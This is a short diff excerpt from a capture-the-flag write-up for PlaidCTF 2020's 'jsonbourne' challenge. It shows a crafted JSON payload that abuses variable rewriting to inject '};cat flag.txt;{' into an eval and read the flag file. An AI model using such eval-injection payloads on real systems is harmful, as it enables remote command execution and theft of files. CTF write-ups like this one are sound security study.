Focshole/ctf_writeups/plaidctf2020/jsonbourne/README.md

 Then we used this vulnerability to rewrite  `_var_name_i`  in such a way that some new variables used in evals would be somehow "double referenced".

-We ended up in :
+We ended up with this monstruosity :

 ```
 ["task _var_name_i=10","var_11","task _var_name_i=10",{"task _var_name_i=13":"=SHELL","var_10":"b"},"concat",{"ta":["ta","aT","task _var_name_i=10",{"task _var_name_i=13":"};cat flag.txt;{","var_12":"b"},"l00p"]}]